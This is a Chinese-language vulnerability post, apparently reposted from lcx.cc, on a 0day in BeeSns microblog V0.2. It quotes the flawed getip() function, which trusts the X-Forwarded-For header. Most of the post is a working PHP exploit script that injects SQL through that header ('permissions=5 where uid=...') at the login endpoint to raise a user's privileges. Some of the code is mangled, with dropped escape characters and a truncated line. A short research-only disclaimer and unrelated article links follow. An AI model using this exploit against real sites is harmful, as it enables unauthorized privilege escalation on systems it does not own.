【漏洞】BeeSns 微博 V0.2 0day

admin

139018
文章

114
评论

2021年4月3日18:50:22评论40 views字数 2899阅读9分39秒阅读模式

发布作者：子仪

影响版本：BeeSns V0.2

官方地址：http://www.beesns.com/

漏洞类型：权限提升

漏洞分析：

IP过滤不严,导致用户可以提交恶意参数提升自身权限。这套微博系统风格挺不错的，个人比较喜欢，看代码是发现一些问题，直接看代码吧。

以下是引用片段：

// 获取客户端IP
function getip()
             { if (isset($_SERVER))
                    { if (isset($_SERVER[HTTP_X_FORWARDED_FOR]))
                           { $realip = $_SERVER[HTTP_X_FORWARDED_FOR]; }
                      elseif (isset($_SERVER[HTTP_CLIENT_IP]))
                           { $realip = $_SERVER[HTTP_CLIENT_IP]; }
                      else { $realip = $_SERVER[REMOTE_ADDR]; }
                     }
                else { if (getenv("HTTP_X_FORWARDED_FOR"))
                           { $realip = getenv( "HTTP_X_FORWARDED_FOR"); }
                        elseif (getenv("HTTP_CLIENT_IP"))
                           { $realip = getenv("HTTP_CLIENT_IP"); }
                         else { $realip = getenv("REMOTE_ADDR"); }
               }
$iphide=explode(".",$realip);
$realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西，IP没过滤，漏洞产生
return $realip;

Exp：

print_r('' +---------------------------------------------------------------------------+

BeeSns v0.2 Getip() Remote SQL Injection Exploit

site:www.beesns.com

by 子仪

Blog: http://www.sitedirsec.com

+---------------------------------------------------------------------------+
'');
if (empty($_POST[submit]))
  {}
else
{ error_reporting(7);
  ini_set(''max_execution_time'', 0);
  $host = $_POST[host];
  $path = $_POST[path];
  $username = $_POST[username];
  $password = $_POST

;
  send();
}

function send()
           { global $host, $path,$username,$password;
             $cmd = "uId=".$username."&uPw=".$password;
             $getinj="1.1.1.1'',permissions=5 where uid=''$username''#";
             $data = "POST ".$path."post.php?act=userLogin HTTP/1.1rn";
             $data .= "Accept: */*rn";
             $data .= "Accept-Language: zh-cnrn"; $data .= "Content-Type: application/x-www-form-urlencodedrn";
             $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn";
             $data .= "Host: $hostrn"; $data .= "Content-Length: ".strlen($cmd)."rn";
             $data .= "Connection: Closern"; $data .= "X-Forwarded-For: $getinjrnrn";
             $data .= $cmd; $fp = fsockopen($host, 80);
             fputs($fp, $data); $resp = '''';
             while ($fp && !feof($fp))
                $resp .= fread($fp, 1024);
             if(preg_match(''#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis'',$resp))
                    {
                     echo "
提升权限成功！";
                    }
             else
                    { echo "Failed!"; }
           }
?>

文章来源于lcx.cc:【漏洞】BeeSns 微博 V0.2 0day

相关推荐: 论比特币，莱特币等山寨货币对黑产的帮助

论比特币，莱特币等山寨货币对黑产的帮助委员长 | 2014-03-07 10:55 1.高匿性比特币莱特币的高匿名性可保护货币钱包持有者的身份信息不被泄露，黑产从业者可利用电子货币代替支付宝，在线网银等传统黑产资金的交易，并一直保持自己的身份不被泄露！ …

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞】BeeSns 微博 V0.2 0day

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信